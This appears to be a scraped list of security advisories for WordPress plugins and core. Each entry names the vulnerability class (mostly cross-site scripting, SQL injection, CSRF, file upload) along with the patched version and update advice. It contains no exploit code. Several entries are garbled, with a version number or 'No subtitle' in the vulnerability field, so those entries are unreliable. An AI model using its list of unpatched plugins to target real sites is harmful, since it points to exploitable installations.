Plugin: ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 7.14.2
Recommended Action: Update to version 7.14.2, or a newer patched version

Plugin: Mobile browser color select

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: తెలుగు బైబిల్ వచనములు

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Footer Putter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: The Awesome Feed – Custom Feed

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ACF Photo Gallery Field

Vulnerability: Authenticated (Subscriber+) Arbitrary Usermeta Update
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Connect Matomo (WP-Matomo, WP-Piwik)

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Display Name
Patched Version: 1.0.28
Recommended Action: Update to version 1.0.28, or a newer patched version

Plugin: Translate WordPress – Google Language Translator

Vulnerability: Cross-Site Scripting
Patched Version: 5.0.06
Recommended Action: Update to version 5.0.06, or a newer patched version

Plugin: Contact Form Integrated With Google Maps

Vulnerability: 2.4
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Leaflet Maps Marker Pro

Vulnerability: Arbitrary File Deletion
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Simple Long Form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: flickrRSS

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ScrollReveal.js Effects

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ECPay Logistics for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.1910240
Recommended Action: Update to version 1.3.1910240, or a newer patched version

Plugin: Privacy Policy Generator, Terms & Conditions Generator WordPress Plugin : WP Legal Pages

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.9.3
Recommended Action: Update to version 2.9.3, or a newer patched version

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.24
Recommended Action: Update to version 2.0.24, or a newer patched version

Plugin: LiveChat – WP live chat plugin for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.7.4
Recommended Action: Update to version 3.7.4, or a newer patched version

Plugin: Far Future Expiry Header

Vulnerability: Plugin’s Settings Update via Cross-Site Request Forgery
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: YaySMTP – WP SMTP Plugin with Full Email Log & 15+ SMTP Services

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: 3.1.3
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3.2.6
Recommended Action: Update to version 1.3.2.6, or a newer patched version

Plugin: WordPress Landing Pages

Vulnerability: Authenticated SQL Injection
Patched Version: 1.8.5
Recommended Action: Update to version 1.8.5, or a newer patched version

Plugin: WooPayments: Integrated WooCommerce Payments

Vulnerability: Unauthenticated Insecure Direct Object Reference
Patched Version: 6.7.0
Recommended Action: Update to version 6.7.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting in the Block Editor
Patched Version: 3.7.33
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.33, 3.8.33, 3.9.31, 4.0.30, 4.1.30, 4.2.27, 4.3.23, 4.4.22, 4.5.21, 4.6.18, 4.7.17, 4.8.13, 4.9.14, 5.0.9, 5.1.5, 5.2.6, 5.3.3, 5.4.1

Plugin: MS-Reviews

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Plugmatter Pricing Table Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Template Kit – Import

Vulnerability: Authenticated (Contributor+) Arbitrary File Upload
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Resource Exhaustion
Patched Version: 1.9.10.58
Recommended Action: Update to version 1.9.10.58, or a newer patched version

Plugin: Email Encoder – Protect Email Addresses and Phone Numbers

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: User Avatar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.12
Recommended Action: Update to version 1.4.12, or a newer patched version

Plugin: ithemes-exchange

Vulnerability: Cross-Site Scripting
Patched Version: 1.12.0
Recommended Action: Update to version 1.12.0, or a newer patched version

Plugin: Modula Image Gallery

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: WP e-Commerce Swipe plugin

Vulnerability: Multiple Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Plugin Info Card

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via option_id GET
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Team

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SpamReferrerBlock

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Visitor Statistics (Real Time Traffic)

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 5.5
Recommended Action: Update to version 5.5, or a newer patched version

Plugin: CampTix Event Ticketing

Vulnerability: CSV Injection
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: WP Tabs – Responsive Tabs and Custom Product Tabs

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WP Job Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Scripting
Patched Version: 2.9.19
Recommended Action: Update to version 2.9.19, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.4
Recommended Action: Update to version 4.2.4, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.47
Recommended Action: Update to version 1.0.47, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: reCaptcha Protection Bypass
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: WP Responsive header image slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quotes for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: SQL Injection via bwg_search_x Parameter
Patched Version: 1.5.55
Recommended Action: Update to version 1.5.55, or a newer patched version

Plugin: Export Users With Meta

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 0.6.5
Recommended Action: Update to version 0.6.5, or a newer patched version

Plugin: UpQode Google Maps

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Admin Columns

Vulnerability: No subtitle
Patched Version: 4.3.2
Recommended Action: Update to version 4.3.2, or a newer patched version

Plugin: Event List

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 0.8.8
Recommended Action: Update to version 0.8.8, or a newer patched version

Plugin: WP Job Manager

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.23.8
Recommended Action: Update to version 1.23.8, or a newer patched version

Core: WordPress

Vulnerability: Contributor Users Can Publish Posts
Patched Version: 3.7.2
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.2, 3.8.2

Plugin: Ping List Pro

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Missing Authorization
Patched Version: 6.4.2
Recommended Action: Update to version 6.4.2, or a newer patched version

Plugin: Social Media Feather | social media sharing

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Insecure Direct Object Reference
Patched Version: 7.3.5
Recommended Action: Update to version 7.3.5, or a newer patched version

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.16.9
Recommended Action: Update to version 1.16.9, or a newer patched version

Plugin: WP Sentry

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom More Link Complete

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Category SEO Meta Tags

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.1
Recommended Action: Update to version 9.1, or a newer patched version

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: SQL Injection
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Left right image slideshow gallery

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 12.1
Recommended Action: Update to version 12.1, or a newer patched version

Plugin: Cab fare calculator

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Ajax Domain Checker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HTTP Headers

Vulnerability: Server-Side Request Forgery
Patched Version: 1.19.0
Recommended Action: Update to version 1.19.0, or a newer patched version

Plugin: tagDiv Composer

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Sermon Browser

Vulnerability: Cross-Site Scripting
Patched Version: 0.43.6
Recommended Action: Update to version 0.43.6, or a newer patched version

Plugin: Custom Body Class

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.7.0
Recommended Action: Update to version 0.7.0, or a newer patched version

Plugin: Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction

Vulnerability: Cross-Site Request Forgery via ajax_add_log_entry
Patched Version: 2.10.5
Recommended Action: Update to version 2.10.5, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 11.6-RC5
Recommended Action: Update to version 11.6-RC5, or a newer patched version

Plugin: 404 to 301 – Redirect, Log and Notify 404 Errors

Vulnerability: SQL Injection
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Interact: Embed A Quiz On Your Site

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: WPML

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5.14
Recommended Action: Update to version 4.5.14, or a newer patched version

Plugin: contus-video-comments

Vulnerability: Authorization Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Meta SEO

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 4.4.9
Recommended Action: Update to version 4.4.9, or a newer patched version

Plugin: Auto Upload Images

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Livestream Notice

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: File Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more

Vulnerability: Server-Side Request Forgery
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via filter_list parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Translate WordPress with GTranslate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.7
Recommended Action: Update to version 2.9.7, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated PHP Object Injection
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Relevanssi – A Better Search

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: InPost Gallery

Vulnerability: Reflected Cross-Site Scripting via ‘imgurl’
Patched Version: 2.1.4.2
Recommended Action: Update to version 2.1.4.2, or a newer patched version

Plugin: SEO Backlinks

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: exchange-addon-table-rate-shipping

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: DZS Video Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 9.64
Recommended Action: Update to version 9.64, or a newer patched version

Plugin: Zendrop – Global Dropshipping

Vulnerability: Arbitrary File Upload
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.10
Recommended Action: Update to version 2.10, or a newer patched version

Plugin: Like Button Rating ♥ LikeBtn

Vulnerability: Unauthorised Vote Export to Email & IP Addresses Disclosure
Patched Version: 2.6.38
Recommended Action: Update to version 2.6.38, or a newer patched version

Plugin: Simple Newsletter Plugin – Noptin

Vulnerability: Unauthenticated CSV Injection
Patched Version: 1.11.0
Recommended Action: Update to version 1.11.0, or a newer patched version

Plugin: Hero Maps Premium

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: [GWA] AutoResponder

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: Missing Authorization
Patched Version: 4.7.2
Recommended Action: Update to version 4.7.2, or a newer patched version

Plugin: Spreadsheet Integration – Automate Google Sheets With WordPress, WooCommerce & Most Popular Form Plugins. Also, Display Google sheet as a Table.

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: WP-UserOnline

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.88.0
Recommended Action: Update to version 2.88.0, or a newer patched version

Plugin: Invite Anyone

Vulnerability: Improper Input Validation
Patched Version: 1.3.16
Recommended Action: Update to version 1.3.16, or a newer patched version

Plugin: Webcam Video Conference

Vulnerability: Arbitrary File Upload
Patched Version: 4.51
Recommended Action: Update to version 4.51, or a newer patched version

Plugin: Instant Images – One-click Image Uploads from Unsplash, Openverse, Pixabay, Pexels, and Giphy

Vulnerability: Authenticated (Author+) Server-Side Request Forgery via instant_images_download
Patched Version: 5.1.0.2
Recommended Action: Update to version 5.1.0.2, or a newer patched version

Plugin: Automatic Youtube Video Posts Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts

Vulnerability: Arbitrary Usermeta Update to Authenticated (Subscriber+) Privilege Escalation
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Authenticated Page Creation and Status Modification
Patched Version: 3.2.6.9
Recommended Action: Update to version 3.2.6.9, or a newer patched version

Plugin: Responsive Lightbox2

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: PDF Builder for WooCommerce. Create invoices,packing slips and more

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 1.2.91
Recommended Action: Update to version 1.2.91, or a newer patched version

Plugin: avalex – Automatisch sichere Rechtstexte

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: My WP Customize Admin/Frontend

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 1.21.1
Recommended Action: Update to version 1.21.1, or a newer patched version

Plugin: DX Share Selection

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Ibtana – Ecommerce Product Addons

Vulnerability: Ecommerce Product Addons <= 0.2.3
Patched Version: 0.2.4
Recommended Action: Update to version 0.2.4, or a newer patched version

Plugin: Download Monitor

Vulnerability: Authenticated (Administrator+) Arbitrary File Download
Patched Version: 4.5.98
Recommended Action: Update to version 4.5.98, or a newer patched version

Plugin: Multiple Page Generator Plugin – MPG

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.10
Recommended Action: Update to version 3.3.10, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Authenticated (Subscriber+) Arbitrary Post Deletion
Patched Version: 1.3.56
Recommended Action: Update to version 1.3.56, or a newer patched version

Plugin: InstaWP Connect – 1-click WP Staging & Migration

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 0.1.0.9
Recommended Action: Update to version 0.1.0.9, or a newer patched version

Plugin: WP-TopBar

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 4.03
Recommended Action: Update to version 4.03, or a newer patched version

Plugin: WP All Import Pro

Vulnerability: Missing Authorization and Cross-Site Request Forgery Checks
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: WPBook

Vulnerability: Unauthenticated Cross-Site Request Forgery
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated PHP Object Injection
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Article analytics

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Us all-in-one button

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: Payment Button for PayPal

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.3.8
Recommended Action: Update to version 1.2.3.8, or a newer patched version

Plugin: WP Adminify – Custom WordPress Dashboard, Login and Admin Customizer

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Tags Cloud Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Google Analytics 4 (GA4), Google Ads, Meta Pixel, GTM & Multiple Pixels for Woocommerce & WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.5.4
Recommended Action: Update to version 6.5.4, or a newer patched version

Plugin: Pinpoint Booking System – #1 WordPress Booking Plugin

Vulnerability: Content Spoofing
Patched Version: 2.9.9.3.5
Recommended Action: Update to version 2.9.9.3.5, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in exec_multitask_widgets function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: WP-PostRatings

Vulnerability: IP Spoofing
Patched Version: 1.91.1
Recommended Action: Update to version 1.91.1, or a newer patched version

Plugin: Post Status Notifier Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.11.1
Recommended Action: Update to version 1.11.1, or a newer patched version

Plugin: Add Widgets to Page

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting via Customizer
Patched Version: 3.7.31
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.31, 3.8.31, 3.9.29, 4.0.28, 4.1.28, 4.2.25, 4.3.21, 4.4.20, 4.5.19, 4.6.16, 4.7.15, 4.8.11, 4.9.12, 5.0.7, 5.1.3, 5.2.4

Plugin: SS Quiz

Vulnerability: Unspecified Vulnerabilities
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Moova for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Authenticated (Contributor+) Information Disclosure
Patched Version: 6.0.3
Recommended Action: Update to version 6.0.3, or a newer patched version

Plugin: TheCartPress eCommerce Shopping Cart

Vulnerability: Multiple Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: SQL Injection
Patched Version: 3.8.8
Recommended Action: Update to version 3.8.8, or a newer patched version

Plugin: JobBoardWP – Job Board Listings and Submissions

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: White Label CMS

Vulnerability: Cross-Site Request Forgery leading to Stored Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Live Scores for SportsPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: BadgeOS

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Contus Video Gallery

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AJAX Store Locator

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Addons for WPBakery

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.16.12
Recommended Action: Update to version 3.16.12, or a newer patched version

Plugin: WebLibrarian

Vulnerability: Reflected Cross-Site Scripting via multiple parameters
Patched Version: 3.5.8.2
Recommended Action: Update to version 3.5.8.2, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.7.9
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.9, 3.8.9, 3.9.7, 4.0.6, 4.1.6, 4.2.3

Core: WordPress

Vulnerability: SQL Injection via Mishandled Placeholders
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 8.5.6
Recommended Action: Update to version 8.5.6, or a newer patched version

Plugin: MultiSafepay plugin for WooCommerce

Vulnerability: Arbitrary File Read
Patched Version: 4.16.0
Recommended Action: Update to version 4.16.0, or a newer patched version

Plugin: Gravity Forms

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.16
Recommended Action: Update to version 1.9.16, or a newer patched version

Plugin: Quick Call Button

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Greg’s High Performance SEO

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Twitter Cards Meta – Best Twitter Card Plugin for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Brands for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

